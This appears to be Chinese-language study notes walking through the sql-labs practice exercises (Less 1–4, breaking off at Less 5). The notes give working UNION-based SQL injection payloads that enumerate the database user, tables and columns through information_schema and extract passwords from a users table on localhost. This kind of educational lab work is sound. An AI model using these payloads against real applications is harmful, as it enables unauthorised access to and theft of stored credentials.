sql注入
补充知识
注入时通常需要用到MySQL中的information_schema数据库名
table表名 table_name table_schema
columns 表中(字段名)table_name table_name
需要一些MySQL的增删改查语句,加之一些联合查询语句
***扩展文字***limit的作用,进行分页
sql注入的条件
1 需要有用户端的输入行为
2 需要有输入端的sql语句拼接在sql程序中,用户端输入与MYSQL数据库有交互。
sql-labs 解题
sql注入一般分为两种类型,一种是数字型,一种是字符型
首先打开这个sql-labs的less 1,please input the id,输入ID来进行测试,首先输入ID=1
接下来,ID=2,测试会有几行,这里可以看到ID=15后面是没有输出的,在测试id=10,测试出共有十四行。
测试注入的符号,使用单引号,双引号,括号等测试。
注意报错的提示语句,
这里使用的是单引号,发现它进行了报错,’‘14’’ LIMIT 0,1’ at line 1,语句前面会使用单引号进行引用,故只需要看单引号中的内容。
根据错误来判断sql语句,单引号注入,先使用单引号进行闭合
–+或者–加空格进行注释
即 ‘ID=1’select 12–+’
字段查询
使用 order by进行查询
注意 注意 注意
联合查询语句只能查询一个结果,故前面的语句必须为假,即ID=-1,之后再加联合查询语句
进行字段数查询
可知字段数
在第一行的第二列和第三列可以进行注入
获取用户名和数据库名称
?id=-1’(结果为假)union联合语句只能执行一个结果
id=-1’ union select 1,user(),database()–加号或者空格
group_concat函数用于连接查询结果
这是表名查询的结果。
?id=-1’union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=“security”),3–+
进行字段查询
?id=-1’ union select 1, (select group_concat(column_name)from information_schema.columns where table_name=‘users’),3–+
接着查询users表中字段username和password
http://localhost:8080/Less-1/?id=-1’ union select 1,2,group_concat(password)from users–+
成功获得用户名和密码
less 2
输入id=1’ 进行报错,发现多出一个单引号
试用and1=1 和and 1=2 ,如果是字符型这两条语句全部转换为真,如果是数字型,1=2为假,无结果
less 3 进行报错测试
单引号,括号,反斜杠等
id=1’
‘1’’)limit 0,1
多单引号以及括号,可以进行闭合尝试
如下图
LESS 4
基于错误进行判断
可以使用”)进行闭合尝试
less 5